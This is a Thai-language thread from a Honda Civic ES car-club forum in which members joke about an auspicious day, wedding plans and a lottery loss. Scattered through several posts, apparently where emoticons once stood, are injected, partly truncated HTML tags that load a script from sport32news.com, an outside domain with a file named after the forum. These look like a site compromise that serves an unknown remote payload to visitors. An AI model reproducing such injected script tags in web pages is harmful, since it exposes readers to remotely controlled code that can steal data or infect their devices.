ตอบ: 74

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 156
ให้คำขอบคุณ: 71

ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 15 มกรา 2013 11:45 - วันดี๊ดี ปี 2556
pirainjung พิมพ์ว่า:
    แจ๋วเลยครับ




สาระดีนะ
 <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></  นานๆทีอะครับ ปกติก็หนักไปทางสาระ...อยู่แล้ว
ได้รับคำขอบคุณจาก: monza 
toshi


เข้าร่วม: 13 พฤศจิกา 2008
ตอบ: 2299

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1405
ให้คำขอบคุณ: 1756

ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 15 มกรา 2013 13:29 - วันดี๊ดี ปี 2556
monza พิมพ์ว่า:
toshi พิมพ์ว่า:
คนในอยากออก  คนนอกอยากเข้า



เป็นไปได้ไหม ถ้าจะเข้าแล้วไม่ออก"<script src="https://sport32news.com/civicesgroup.js">


   อันนี้ไม่กล้าฟันธง เพราะแต่ละบุคคล....ไม่เหมือนกัน
ได้รับคำขอบคุณจาก: monza 
underhill


เข้าร่วม: 15 กันยา 2011
ตอบ: 3545

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4125
ให้คำขอบคุณ: 1677

ปี: 2002
สี: น้ำเงิน อิเทอนอล (B-96P)
อังคาร, 15 มกรา 2013 14:42 - วันดี๊ดี ปี 2556
ก็นึกว่า จะแต่งงาน ซะเอง  <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: monza 
pom_sawas


เข้าร่วม: 13 ธันวา 2008
ตอบ: 886

Guru ES
Guru ES

ได้รับคำขอบคุณ: 664
ให้คำขอบคุณ: 898

ที่อยู่: ร้านขายนมผง
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 15 มกรา 2013 15:20 - วันดี๊ดี ปี 2556
eskung พิมพ์ว่า:
ผมรอเดือนมิถุนายน




รอฤกษ์ หรือรอ เลิก อิอิ ล้อเล่น
ได้รับคำขอบคุณจาก: monza 
monza


ชื่อเล่น: อิฉัน

เข้าร่วม: 20 มิถุนา 2012
ตอบ: 804

Guru ES
Guru ES

ได้รับคำขอบคุณ: 867
ให้คำขอบคุณ: 773

ที่อยู่: สุขุมวิท 71
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 15 มกรา 2013 15:32 - วันดี๊ดี ปี 2556
pom_sawas พิมพ์ว่า:
eskung พิมพ์ว่า:
ผมรอเดือนมิถุนายน




รอฤกษ์ หรือรอ เลิก อิอิ ล้อเล่น



พี่เค้ารอฤกษ์ อาสิคะ
monza


ชื่อเล่น: อิฉัน

เข้าร่วม: 20 มิถุนา 2012
ตอบ: 804

Guru ES
Guru ES

ได้รับคำขอบคุณ: 867
ให้คำขอบคุณ: 773

ที่อยู่: สุขุมวิท 71
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 15 มกรา 2013 15:33 - วันดี๊ดี ปี 2556
underhill พิมพ์ว่า:
ก็นึกว่า จะแต่งงาน ซะเอง  <script src="https://sport32news.com/civicesgroup.js"></


กำลังตัดสินใจคะ
วุฒิชัย


ชื่อเล่น: ตั้ม

เข้าร่วม: 26 มิถุนา 2011
ตอบ: 4151

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3281
ให้คำขอบคุณ: 4338

ที่อยู่: แม่สอด-ตาก-โขทัย-อุตรดิตถ์
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 16 มกรา 2013 18:53 - วันดี๊ดี ปี 2556
นึกว่าจะแต่งงานชะอีก
ได้รับคำขอบคุณจาก: monza 
Auto_es


ชื่อเล่น: อ้น

เข้าร่วม: 03 ตุลา 2012
ตอบ: 267

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 1382
ให้คำขอบคุณ: 740

ที่อยู่: สมุทรปราการ (แพรกษา)
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 16 มกรา 2013 23:18 - วันดี๊ดี ปี 2556
monza พิมพ์ว่า:

underhill พิมพ์ว่า:
ก็นึกว่า จะแต่งงาน ซะเอง <script src="https://sport32news.com/civicesgroup.js"></


กำลังตัดสินใจคะ



สงสัย....รอแล้วคงไม่ได้อะไร <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: monza 
wangyu


ชื่อเล่น: เอ๊ช

เข้าร่วม: 17 มิถุนา 2010
ตอบ: 7619

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6468
ให้คำขอบคุณ: 7442

ที่อยู่: ลำผักชี,หนองจอก,ลาดกระบัง,มาบตาพุด ระยอง
ปี: 2005
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 17 มกรา 2013 07:57 - วันดี๊ดี ปี 2556
วันดี๊ดีมีเดือนละ 2หน
1กับ16 ของเดือน  อิอิ






ได้รับคำขอบคุณจาก: monza 
monza


ชื่อเล่น: อิฉัน

เข้าร่วม: 20 มิถุนา 2012
ตอบ: 804

Guru ES
Guru ES

ได้รับคำขอบคุณ: 867
ให้คำขอบคุณ: 773

ที่อยู่: สุขุมวิท 71
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 17 มกรา 2013 08:26 - วันดี๊ดี ปี 2556
wangyu พิมพ์ว่า:
วันดี๊ดีมีเดือนละ 2หน
1กับ16 ของเดือน  อิอิ








อย่าๆๆๆเมื่อวานโดนไปหลายร้อย
zzz


เข้าร่วม: 06 กรกฎา 2010
ตอบ: 760

Guru ES
Guru ES

ได้รับคำขอบคุณ: 572
ให้คำขอบคุณ: 360

ที่อยู่: ทุกที่...ที่มีงานทำ
ปี: 2002
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 17 มกรา 2013 09:56 - วันดี๊ดี ปี 2556
tochi229 พิมพ์ว่า:
กำลังหาแม่ของลูกอยู่ครับ...




+1
ได้รับคำขอบคุณจาก: monza 
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.